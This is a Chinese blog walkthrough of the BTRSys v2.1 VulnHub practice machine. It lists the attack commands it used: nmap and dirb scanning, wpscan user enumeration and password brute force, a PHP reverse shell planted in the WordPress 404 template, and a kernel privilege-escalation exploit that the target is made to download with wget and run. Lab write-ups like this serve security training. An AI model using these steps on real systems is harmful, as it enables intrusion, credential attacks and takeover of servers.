BTRSys:v2.1靶机

最新推荐文章于 2024-01-06 10:16:01 发布
最新推荐文章于 2024-01-06 10:16:01 发布
阅读量429 收藏
点赞数
分类专栏: 靶机 文章标签: linux wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/117649374
版权

BTRSys:v2.1靶机

主机扫描,arp-scan -l

nmap -sV -pN -A x.x.x.228,发现80,21,22端口

dirb http://x.x.x.228,发现网站是wordpress搭建的

用wpscan枚举用户和插件,找到了两个用户btrisk和admin

wpscan --url http://x.x.x.228/wordpress -e u vp

爆破出用户admin的密码admin

wpscan --url http://x.x.x.228/wordpress  -U admin -P  /usr/share/wordlists/rockyou.txt

登录wordpress页面

登录wordpress,发现可以修改页面

修改404页面

把php的反弹shell写入404页面(这里反弹shell用的是kali的/usr/share/webshells/php/php-reverse-shell.php),并且用kali的nc监听,然后访问页面http://ip/wordpress/wp-content/themes/twentyfourteen/404.php

查看内核版本为ubuntu 4.4.0

在kali上面找一下对应版本的提权脚本

searchsploit ubuntu 4.4.0

将提权脚本编译后放到/var/www/html,让靶机wget到/tmp目录执行

searchsploit -m 44298
gcc 44298.c -o getroot
mv getroot /var/www/html/
/etc/init.d/apache2 start

进入tmp目录下载

提权成功

 

xzhome
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF之BTRSys v2.1 靶机渗透(wordpress 404页面上传webshell)
afei001
04-02 1165
练习环境     攻击机:kali     靶机BTRSys: v2.1 下载地址:https://download.vulnhub.com/btrsys/BTRSys2.1.rar 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500...
靶机-BTRSys 2.1 Walkthrough
banacyo14206的博客
08-22 656
BTRSys 2.1 https://www.vulnhub.com/entry/btrsys-v21,196/ 参考:https://www.jianshu.com/p/9813095ce04d 提权辅助工具LinEnum下载:https://download.csdn.net/download/weixin_41082546/11609409提权辅助工具linuxprivc...
BTRSys: v1靶机
小小猪的博客
06-08 747
BTRSys: v1靶机 靶机地址:https://www.vulnhub.com/entry/btrsys-v1,195/ 靶机难度:初级/中级 arp-scan -l 扫描获取靶机ip:x.x.x.229 nmap -sV -Pn -A x.x.x.229 扫描出80,22,21端口 dirb http://x.x.x.229 -X .php 扫描出config.php,login.php 登录,弱口令,不成功 查看源码 substring就是截取,...
vulnhub BTRSys: v2.1
箭雨镜屋
08-30 546
渗透思路:nmap扫描端口 ---- gobuster扫描网站目录 ---- wpscan扫描wordpress用户名并爆破密码 ---- 利用WordPress的模板编辑功能getshell ---- wordpress配置文件泄露数据库用户名密码 ---- 数据库泄露btrisk用户的密码 ---- sudo su提权...
Vulnhub-Btrsys-2靶机实战
御七彩虹猫
04-18 2750
Vulnhub-Btrsys-2靶机实战
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
OWASP靶机、安全学习、测试
05-24
这里提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
cms.rar,靶机的源码
07-03
【CMS靶机源码解析与相关知识点】 CMS(Content Management System,内容管理系统)是一种用于构建和管理网站的应用程序,它提供了便捷的用户界面,让非技术背景的人员也能轻松编辑和发布内容。在这个名为“cms.rar...
PWN靶机环境 网络安全
05-23
PWN靶机环境
BTRSYS 2.1 WALKTHROUGH
weixin_41082546的博客
08-11 403
BTRSys 2.1 https://www.vulnhub.com/entry/btrsys-v21,196/ 1.确定目标ip 2.端口和服务探测 根据vsftp版本没有找到相关漏洞利用代码 然后我们转战web 查看页面代码,前端源代码中也没有什么有意义的东西 nikto -h 192.168.88.199 发现在robots.txt 文件中 存在 wo...
靶机渗透——BTRsys1
1匹黑马
02-23 1670
文章目录任务环境信息收集漏洞挖掘漏洞利用权限获取权限提升 任务环境 攻击机:Kali2019 靶机:BRTsys1 涉及知识点:代码审计、目录遍历、文件上传、脏牛提权 信息收集 还是老样子先进行信息收集: arp-scan -l #扫描内网存活主机 接着扫一下开放的端口与版本信息 nmap -sV -O 192.168.1.116 开放了22、80端口,话不多说,直接扫一下Web页面...
BTRsys-2
qq_42307546的博客
11-04 437
nmap对目标进行扫描 nmap -A -p 80,21,22 -oA BTR.log Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-04 00:16 CST WARNING: No targets were specified, so 0 hosts scanned. Nmap done: 0 IP addresses (0 hosts up) scanned in 1.24 seconds root@kali:~/BTRsys-2# nmap -A
靶机实战(9):OSCP备考之VulnHub BTRSys v2.1
最新发布
OneMoreThink
01-06 959
靶机官网:BTRSys: v2.1[1]实战思路:一、主机发现二、端口发现(服务、组件、版本)三、漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞22端口/SSH服务组件漏洞口令漏洞80端口/HTTP服务组件漏洞URL漏洞(目录、文件)四、提升权限www-data用户sudosuidcron内核提权信息收集btrisk用户sudo一、主机发现本次攻击指定IP,不涉及主机发现过程。二、端口发...
BTRSys1靶场复现详细过程
hcufo的博客
09-06 245
一次靶详细的靶场演练,非常成功
靶机渗透测试实战(六)——Zico2渗透实战
橘子女侠
05-11 6714
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
CTF靶场——BTRsys-2
su__xiaoyan的博客
01-24 1057
实验环境 攻击机:192.168.100.146 靶机:192.168.100.139 实验流程 端口扫描 端口详细信息探测 命令:nmap -T4 -A -v 靶机IP地址 FTP服务由vsftpd 3.0.3搭建,不存在代码溢出漏洞 网站详细信息探测 网站疑似使用WordPress作为建站系统 web网站目录爆破 证实以WordPress作为建站系统,并且拿到网站后台登录页面 访问网站后台登录页面,尝试使用弱口令进行登录,登录成功(admin/admin) 漏洞利用 WordPress后台存
OSCP系列靶场-Intermediate-BTRSys2.1保姆级
杳若的博客
09-19 350
OSCP系列靶场-Intermediate-BTRSys2.1保姆级
the planets: earth靶机
04-11
问题:关于行星:地球和静机。 回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值